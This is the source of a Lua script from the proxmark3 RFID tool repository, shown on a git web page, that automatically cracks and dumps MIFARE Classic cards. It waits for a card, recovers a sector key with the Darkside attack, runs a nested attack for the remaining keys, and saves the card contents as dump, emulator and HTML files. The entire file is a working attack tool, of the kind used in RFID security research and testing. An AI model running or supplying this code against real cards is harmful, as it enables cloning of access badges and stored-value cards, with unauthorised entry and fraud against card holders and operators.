]> git.zerfleddert.de Git - proxmark3-svn/blob - client/scripts/mifare_autopwn.lua
ADD: since the client now calls legic prng, this is needed here too.
[proxmark3-svn] / client / scripts / mifare_autopwn.lua
1 local getopt = require('getopt')
2 local reader = require('read14a')
3 local cmds = require('commands')
4
5 example = "script run mifare_autopwn"
6 author = "Martin Holst Swende"
7
8
9 desc =
10 [[
11 This is a which automates cracking and dumping mifare classic cards. It sets itself into
12 'listening'-mode, after which it cracks and dumps any mifare classic card that you
13 place by the device.
14
15 Arguments:
16 -d debug logging on
17 -h this help
18
19 Output files from this operation:
20 <uid>.eml - emulator file
21 <uid>.html - html file containing card data
22 dumpkeys.bin - keys are dumped here. OBS! This file is volatile, as other commands overwrite it sometimes.
23 dumpdata.bin - card data in binary form. OBS! This file is volatile, as other commands (hf mf dump) overwrite it.
24
25 ]]
26
27 -------------------------------
28 -- Some utilities
29 -------------------------------
30 local DEBUG = false
31 local MIFARE_AUTH_KEYA = 0x60
32 local MIFARE_AUTH_KEYB = 0x61
33 ---
34 -- A debug printout-function
35 function dbg(args)
36 if DEBUG then
37 print(":: ", args)
38 end
39 end
40 ---
41 -- This is only meant to be used when errors occur
42 function oops(err)
43 print("ERROR: ",err)
44 return nil,err
45 end
46
47 ---
48 -- Usage help
49 function help()
50 print(desc)
51 print("Example usage")
52 print(example)
53 end
54
55 ---
56 -- Waits for a mifare card to be placed within the vicinity of the reader.
57 -- @return if successfull: an table containing card info
58 -- @return if unsuccessfull : nil, error
59 function wait_for_mifare()
60 while not core.ukbhit() do
61 res, err = reader.read1443a()
62 if res then return res end
63 -- err means that there was no response from card
64 end
65 return nil, "Aborted by user"
66 end
67
68 function mfcrack()
69 core.clearCommandBuffer()
70 -- Build the mifare-command
71 local cmd = Command:new{cmd = cmds.CMD_READER_MIFARE, arg1 = 1, arg2 = 0, arg3 = MIFARE_AUTH_KEYA}
72
73 local retry = true
74 while retry do
75 core.SendCommand(cmd:getBytes())
76 local key, errormessage = mfcrack_inner()
77 -- Success?
78 if key then return key end
79 -- Failure?
80 if errormessage then return nil, errormessage end
81 -- Try again..set arg1 to 0 this time.
82
83 cmd = Command:new{cmd = cmds.CMD_READER_MIFARE, arg1 = 0, arg2 = 0, arg3 = MIFARE_AUTH_KEYA}
84 end
85 return nil, "Aborted by user"
86 end
87
88 function mfcrack_inner()
89 while not core.ukbhit() do
90 local result = core.WaitForResponseTimeout(cmds.CMD_ACK,1000)
91 if result then
92
93 --[[
94 I don't understand, they cmd and args are defined as uint32_t, however,
95 looking at the returned data, they all look like 64-bit things:
96
97 print("result", bin.unpack("HHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH", result))
98
99 FF 00 00 00 00 00 00 00 <-- 64 bits of data
100 FE FF FF FF 00 00 00 00 <-- 64 bits of data
101 00 00 00 00 00 00 00 00 <-- 64 bits of data
102 00 00 00 00 00 00 00 00 <-- 64 bits of data
103 04 7F 12 E2 00 <-- this is where 'data' starts
104
105 So below I use LI to pick out the "FEFF FFFF", don't know why it works..
106 --]]
107 -- Unpacking the arg-parameters
108 local count,cmd,isOK = bin.unpack('LI',result)
109 --print("response", isOK)--FF FF FF FF
110 if isOK == 0xFFFFFFFF then
111 return nil, "Button pressed. Aborted."
112 elseif isOK == 0xFFFFFFFE then
113 return nil, "Card is not vulnerable to Darkside attack (doesn't send NACK on authentication requests). You can try 'script run mfkeys' or 'hf mf chk' to test various known keys."
114 elseif isOK == 0xFFFFFFFD then
115 return nil, "Card is not vulnerable to Darkside attack (its random number generator is not predictable). You can try 'script run mfkeys' or 'hf mf chk' to test various known keys."
116 elseif isOK == 0xFFFFFFFC then
117 return nil, "The card's random number generator behaves somewhat weird (Mifare clone?). You can try 'script run mfkeys' or 'hf mf chk' to test various known keys."
118 elseif isOK ~= 1 then
119 return nil, "Error occurred"
120 end
121
122
123 -- The data-part is left
124 -- Starts 32 bytes in, at byte 33
125 local data = result:sub(33)
126
127 -- A little helper
128 local get = function(num)
129 local x = data:sub(1,num)
130 data = data:sub(num+1)
131 return x
132 end
133
134 local uid,nt,pl = get(4),get(4),get(8)
135 local ks,nr = get(8),get(4)
136
137 local status, key = core.nonce2key(uid, nt, nr, pl, ks)
138 if not status then return status,key end
139
140 if status > 0 then
141 print("Key not found (lfsr_common_prefix problem)")
142 -- try again
143 return nil,nil
144 else
145 return key
146 end
147 end
148 end
149 return nil, "Aborted by user"
150 end
151
152 function nested(key,sak)
153 local typ = 1
154 if 0x18 == sak then --NXP MIFARE Classic 4k | Plus 4k
155 typ = 4
156 elseif 0x08 == sak then -- NXP MIFARE CLASSIC 1k | Plus 2k
157 typ= 1
158 elseif 0x09 == sak then -- NXP MIFARE Mini 0.3k
159 typ = 0
160 elseif 0x10 == sak then-- "NXP MIFARE Plus 2k"
161 typ = 2
162 elseif 0x01 == sak then-- "NXP MIFARE TNP3xxx 1K"
163 typ = 1
164 else
165 print("I don't know how many sectors there are on this type of card, defaulting to 16")
166 end
167 local cmd = string.format("hf mf nested %d 0 A %s d",typ,key)
168 core.console(cmd)
169 end
170
171 function dump(uid)
172 core.console("hf mf dump")
173 -- Save the global args, those are *our* arguments
174 local myargs = args
175 -- Set the arguments for htmldump script
176 args =("-o %s.html"):format(uid)
177 -- call it
178 require('../scripts/htmldump')
179
180 args =""
181 -- dump to emulator
182 require('../scripts/dumptoemul')
183 -- Set back args. Not that it's used, just for the karma...
184 args = myargs
185 end
186
187 ---
188 -- The main entry point
189 function main(args)
190
191 local verbose, exit,res,uid,err,_,sak
192 local seen_uids = {}
193 local print_message = true
194 -- Read the parameters
195 for o, a in getopt.getopt(args, 'hd') do
196 if o == "h" then help() return end
197 if o == "d" then DEBUG = true end
198 end
199
200 while not exit do
201 if print_message then
202 print("Waiting for card or press any key to stop")
203 print_message = false
204 end
205 res, err = wait_for_mifare()
206 if err then return oops(err) end
207 -- Seen already?
208 uid = res.uid
209 sak = res.sak
210 if not seen_uids[uid] then
211 -- Store it
212 seen_uids[uid] = uid
213 print("Card found, commencing crack on UID", uid)
214 -- Crack it
215 local key, cnt
216 res,err = mfcrack()
217 if not res then return oops(err) end
218 -- The key is actually 8 bytes, so a
219 -- 6-byte key is sent as 00XXXXXX
220 -- This means we unpack it as first
221 -- two bytes, then six bytes actual key data
222 -- We can discard first and second return values
223 _,_,key = bin.unpack("H2H6",res)
224 print("Found valid key: "..key);
225
226 -- Use nested attack
227 nested(key,sak)
228 -- Dump info
229 dump(uid)
230 print_message = true
231 end
232 end
233 end
234
235 -- Call the main
236 main(args)
Impressum, Datenschutz